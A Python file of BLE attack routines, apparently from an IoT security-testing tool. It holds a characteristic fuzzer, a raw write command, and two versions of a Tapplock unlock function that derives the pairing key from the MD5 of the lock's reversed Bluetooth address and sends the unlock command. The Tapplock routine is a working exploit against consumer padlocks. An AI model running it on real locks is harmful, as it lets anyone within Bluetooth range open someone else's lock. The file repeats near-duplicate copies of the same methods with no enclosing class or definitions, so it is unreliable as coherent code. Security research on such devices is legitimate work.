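def execute(self):
    """Write randomly fuzzed values to one characteristic handle.

    All inputs come from ``self.args``: ``addr`` (device address),
    ``randaddrtype`` (use the random address type instead of public),
    ``handle`` (characteristic handle), ``value`` (hex template),
    ``iter`` (number of writes) and ``noresponse``.

    Every ``xx`` pair in the template is replaced by a freshly drawn random
    byte on each iteration; all other hex digits are sent as given. Any
    failure is handed to ``self.result.exception()`` and the connection is
    closed in all cases.
    """
    TLog.generic(
        "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
        .format(self.args.value, self.args.iter,
                hex(self.args.handle), self.args.addr))
    # Bind the name before the try block: if BlePeripheral() itself raises,
    # the finally clause must not fail with an UnboundLocalError that would
    # replace the failure that was just reported.
    device = None
    try:
        device = BlePeripheral()
        device.connect(
            self.args.addr,
            addrType=(Ble.ADDR_TYPE_RANDOM
                      if self.args.randaddrtype
                      else Ble.ADDR_TYPE_PUBLIC),
        )
        for _ in range(self.args.iter):
            value = self.args.value
            # Substitute one placeholder at a time so that every "xx" gets
            # its own random byte. The replacement only contains hex digits,
            # so it can never create a new "xx".
            while "xx" in value:
                value = value.replace(
                    "xx", "{:02x}".format(randint(0, 0xFF)), 1  # nosec
                )
            # The exact bytes are logged before each write; the generator is
            # not seeded here, so this log is the only record of what was
            # sent if the device misbehaves afterwards.
            TLog.trydo("Writing the fuzzed value ({})".format(value))
            device.writeCharacteristic(
                self.args.handle,
                bytes.fromhex(value),
                withResponse=(not self.args.noresponse),
            )
    except:  # noqa: E722
        # Deliberately broad: whatever stops the run is reported through the
        # test result instead of propagating to the caller.
        self.result.exception()
    finally:
        if device is not None:
            device.disconnect()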
def execute(self):
    """Write a single hex-encoded value to a characteristic handle.

    Reads ``addr``, ``randaddrtype``, ``handle``, ``value`` and
    ``noresponse`` from ``self.args``. Failures are passed to
    ``self.result.exception()``; the device is disconnected in all cases.
    """
    opts = self.args
    TLog.generic(
        "Writing the value ({}) to handle ({}) on BLE device ({})".format(
            opts.value, hex(opts.handle), opts.addr
        )
    )
    peripheral = BlePeripheral()
    try:
        if opts.randaddrtype:
            addr_type = ADDR_TYPE_RANDOM
        else:
            addr_type = ADDR_TYPE_PUBLIC
        peripheral.connect(opts.addr, addrType=addr_type)
        # Decode only after the connection is up, so a malformed hex string
        # is reported at the same point as before.
        payload = bytes.fromhex(opts.value)
        peripheral.writeCharacteristic(
            opts.handle, payload, withResponse=not opts.noresponse
        )
    except:  # noqa: E722
        # Deliberately broad: every failure ends up on the test result.
        self.result.exception()
    finally:
        peripheral.disconnect()
def unlock(self, mac, name=None):
    """
    Send the pairing frame and the unlock command to one Tapplock.

    Unless ``self.args.default`` is set, key1 and serial are taken from the
    MD5 digest of the byte-reversed, upper-cased BLE address, so the pairing
    frame depends on nothing but the address passed in. Otherwise the
    class-level default frame is used.

    Args:
        mac(str): The BLE address of the Tapplock
        name(str): The name of the Tapplock as advertised over BLE

    Returns:
        Nothing
    """
    device = BlePeripheral()
    try:
        TLog.trydo("Unlocking Tapplock ({})".format(mac))
        if self.args.default is False:
            # Reverse the colon-separated octets of the address, then hash.
            # MD5 is used because the value is derived that way, not as a
            # security primitive of this tool (hence the nosec marker).
            octets = mac.upper().split(":")
            remote_mac = ":".join(reversed(octets))
            digest = md5(remote_mac.encode()).hexdigest()  # nosec
            key1, serial = digest[:8], digest[16:24]
            TLog.generic(
                "(Calculated hash={})(key1={})(serial={})".format(
                    digest, key1, serial
                )
            )
            frame = self.PAIRPREXIX + key1 + serial
        else:
            TLog.generic(
                "(default key1={})(default serial={})".format(
                    self.DEFKEY, self.DEFSERIAL
                )
            )
            frame = self.DEFPAIR
        # Additive checksum over the frame bytes. Each byte is reduced
        # modulo 255 (not 256), so a 0xff byte contributes 0.
        # NOTE(review): confirm the modulus against the lock's protocol.
        total = sum(octet % 255 for octet in bytes.fromhex(frame))
        total_hex = "{:04x}".format(total)
        # The checksum is appended low byte first.
        frame = frame + total_hex[2:4] + total_hex[0:2]
        device.connect(mac, addrType=ADDR_TYPE_RANDOM)
        for message in (frame, self.UNLOCKCMD):
            device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(message))
        self.output_handler(
            tlogtype=TLog.TRYDO,
            logkwargs=LOGPRETTY,
            name=name,
            addr=device.addr,
            sent_pair_data=frame,
            sent_unlock_cmd=self.UNLOCKCMD,
        )
    finally:
        device.disconnect()
def unlock(self, mac):
    """
    Pair with the specified Tapplock and send it the unlock command.

    The pairing data is built from the MD5 digest of the reversed BLE
    address, or from the class defaults when ``self.args.default`` is set,
    followed by a two-byte additive checksum.

    :param mac: The BLE address of the Tapplock
    :return:
    """
    device = BlePeripheral()
    try:
        TLog.trydo("Unlocking Tapplock ({})".format(mac))
        use_defaults = self.args.default is not False
        if use_defaults:
            TLog.generic("(default key1={})(default serial={})".format(
                self.DEFKEY, self.DEFSERIAL))
            body = self.DEFPAIR
        else:
            # key1 and serial are two slices of one digest computed over the
            # address with its octets in reverse order. The digest and both
            # slices are written to the log below.
            parts = mac.upper().split(":")
            parts.reverse()
            md5_hash = md5(":".join(parts).encode()).hexdigest()  # nosec
            key1 = md5_hash[0:8]
            serial = md5_hash[16:24]
            TLog.generic("(Calculated hash={})(key1={})(serial={})".format(
                md5_hash, key1, serial))
            body = self.PAIRPREXIX + key1 + serial
        # Sum of the body bytes, each taken modulo 255, rendered as four hex
        # digits and appended with its two bytes swapped.
        checksum = 0
        for value in bytes.fromhex(body):
            checksum += value % 255
        digits = "{:04x}".format(checksum)
        pairing_data = body + digits[2:4] + digits[0:2]
        device.connect(mac, addrType=ADDR_TYPE_RANDOM)
        TLog.trydo("Sending pair data({})".format(pairing_data))
        device.writeCharacteristic(self.UNLOCKHNDL,
                                   bytes.fromhex(pairing_data))
        TLog.trydo("Sending unlock command({})".format(self.UNLOCKCMD))
        device.writeCharacteristic(self.UNLOCKHNDL,
                                   bytes.fromhex(self.UNLOCKCMD))
    finally:
        device.disconnect()
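def execute(self):
    """Write randomly fuzzed values to one characteristic handle.

    Reads ``addr``, ``randaddrtype``, ``handle``, ``value``, ``iter`` and
    ``noresponse`` from ``self.args``. On each of the ``iter`` rounds every
    ``xx`` pair in ``value`` is replaced by a random byte and the result is
    written to ``handle``. Failures go to ``self.result.exception()``; the
    connection is closed afterwards if a peripheral object was created.
    """
    TLog.generic(
        "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
        .format(self.args.value, self.args.iter,
                hex(self.args.handle), self.args.addr))
    # Pre-bind the name: when BlePeripheral() raises, the finally clause
    # used to fail with an UnboundLocalError that hid the real failure.
    device = None
    try:
        device = BlePeripheral()
        device.connect(self.args.addr,
                       addrType=(Ble.ADDR_TYPE_RANDOM
                                 if self.args.randaddrtype
                                 else Ble.ADDR_TYPE_PUBLIC))
        for _ in range(self.args.iter):
            fuzzed = self.args.value
            # One replacement per pass, so each placeholder gets its own
            # independently drawn byte.
            while "xx" in fuzzed:
                fuzzed = fuzzed.replace(
                    "xx", "{:02x}".format(randint(0, 0xff)), 1)
            # Logged before the write so the last value sent is on record
            # if the device stops responding.
            TLog.trydo("Writing the fuzzed value ({})".format(fuzzed))
            device.writeCharacteristic(
                self.args.handle,
                bytes.fromhex(fuzzed),
                withResponse=(not self.args.noresponse))
    except:  # noqa: E722
        # Deliberately broad: any failure is reported on the test result.
        self.result.exception()
    finally:
        if device is not None:
            device.disconnect()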